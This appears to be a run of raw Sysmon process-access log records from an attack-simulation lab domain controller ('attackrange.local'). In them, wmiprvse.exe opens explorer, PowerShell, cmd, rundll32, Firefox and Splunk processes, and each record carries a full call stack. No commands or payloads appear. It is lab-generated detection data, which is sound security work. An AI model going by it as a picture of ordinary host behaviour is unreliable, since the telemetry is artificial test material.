22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.911{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 